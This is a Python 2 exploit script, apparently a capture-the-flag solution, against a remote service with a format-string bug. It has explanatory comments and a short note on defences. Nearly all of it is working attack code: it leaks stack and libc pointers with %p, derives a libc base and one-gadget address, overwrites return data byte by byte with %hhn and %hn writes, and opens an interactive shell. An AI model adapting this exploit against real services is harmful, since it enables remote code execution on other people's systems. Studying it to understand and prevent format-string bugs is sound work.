# Remote format-string exploit script (Python 2: print statements, integer '/').
#
# Flow visible below: connect, read one byte the service prints, use a
# '%<N>c%<k>$hhn' / '%<k>$hn' / '%<k>$n' format-string write primitive to
# (1) leak stack/libc pointers via 100 '%p' conversions, (2) write the
# 'oneshot' address byte-by-byte, (3) zero an argument, then hand the
# connection to an interactive shell helper.  All offsets are hard-coded and
# presumably specific to the target binary and libc build — not verified here.
#
# Defender note: the underlying bug class is a user-controlled format string
# reaching printf.  A constant format string, -Wformat-security, and
# _FORTIFY_SOURCE (which rejects %n in writable format strings) stop this
# primitive; ASLR alone is bypassed here through the %p leak.
#
# 'phun' is a project-local helper (Remote with read/write/shell); its
# semantics are assumed from usage: read(marker) reads up to and including
# the marker, read(1) reads one byte, shell() goes interactive.
import phun
import sys

off = 0x71          # added to the byte the service prints to form the first %hhn value
off2 =0x31          # NOTE: unused in this script
#r = phun.Remote('192.168.122.234',1234)
#raw_input('e')
r = phun.Remote('flatearth.fluxfingers.net',1747)
r.read(' is ')
b=ord(r.read(1))    # one byte echoed by the service after " is "
r.read('?')
xbyte= off + b      # value for the first single-byte (%hhn) write
if xbyte > 0xff:
    # %hhn stores one byte; a larger printed-char count cannot be expressed here.
    print '[-] sorry :('
    sys.exit(1)
# Print xbyte chars, store that count through positional arg 6 as one byte,
# then dump 100 stack words as '|%p|' so they can be split on '||' below.
r.write('%' + str(int(xbyte))+ 'c%6$hhn'+ '|%p|' * 100 + "\n")
leak = r.read('My fav')
leak = leak.split('||')
# Addresses derived from the leaked pointers; every constant offset is
# target-specific (presumably taken from the challenge binary/libc).
stack_r = int(leak[8],16)+0xb0-8    # stack address used as the %6$hn write target
stack_x = int(leak[4],16)           # NOTE: computed but not used afterwards
stack_a = int(leak[45],16)
libc = int(leak[15],16) - 0x20830   # libc base = leaked libc pointer minus a fixed offset
oneshot = libc + 0x4526A            # address written byte-by-byte in the first loop
#p1 = '%' + str(int(xbyte))+ 'c%6$hhn'

# Loop 1: 15 rounds alternating between
#   even i : write byte (i/2) of 'oneshot' (little-endian) via the positional
#            index from the list below,
#   odd i  : write 'base' (low byte of stack_a, incremented each time) via arg 13.
# Each round first sets the 2-byte value reachable through arg 6 to the low
# 16 bits of stack_r, then prints just enough extra chars so that the total
# count modulo 256 equals the wanted byte.
# NOTE: with range(15), 'i > 16' is never true and the 9th list entry (3) is never used.
base = stack_a& 0xff
for i in range(15):
    if i % 2:
        base +=1
        b = base
        idx = 13
    else:
        b = 0 if i > 16 else (oneshot>>(8*(i/2)))&0xff
        idx = [65,55,63,71,79,87,95,103,3][(i/2)]
    p = ''
    r.read('?')
    bb = (stack_r) & 0xffff
    p += '%' + str(bb) + 'c%6$hn'   # point the arg-6 target at stack_r (low 16 bits)
    bb = bb&0xff
    # 'bb' chars are already printed; compute the extra chars needed (mod 256).
    if bb > b:
        b = (0x100 + b)-bb
    else:
        b = b - bb
    # print idx,hex(b)
    p +='%' + str(b) + 'c%' + str(idx) +'$hhn'
    p += "\n"
    r.write(p)
    stack_r -= 0x20   # next round targets 0x20 bytes lower (presumably the next frame)
print '[*] one-shot setted up'

# Loop 2: 4 rounds alternating between
#   even i : write 'base' (16-bit, advancing by 4) via arg 13,
#   odd i  : write 0 via '%<idx>$n' (arg 111 or 119) — "nulls out" the argument.
base = (stack_a + 0x38)&0xffff
for i in range(4):
    if i % 2:
        b = 0
        idx = [111,119][(i/2)]
    else:
        b = base
        base += 4
        idx = 13
    r.read('?')
    p = ''
    bb = (stack_r) & 0xffff
    if not b:
        # Nothing printed yet, so %n stores 0; then re-point arg 6 as before.
        p +='%' + str(idx) +'$n'
        p += '%' + str(bb) + 'c%6$hn'
    else:
        p += '%' + str(bb) + 'c%6$hn'
        b = b - bb   # extra chars so the running count equals the wanted 16-bit value
        p +='%' + str(b) + 'c%' + str(idx) +'$hn'
    p += "\n"
    r.write(p)
    stack_r -= 0x20
print '[*] arg nulled out'

# Final write: set the arg-6 target to (stack_a & 0xffff) - 8, then go interactive.
r.read('?')
bb = (stack_a & 0xffff) - 8
r.write('%' + str(bb) + 'c%6$hn|\n')
r.read('|')
print '[+] shell?'
r.shell()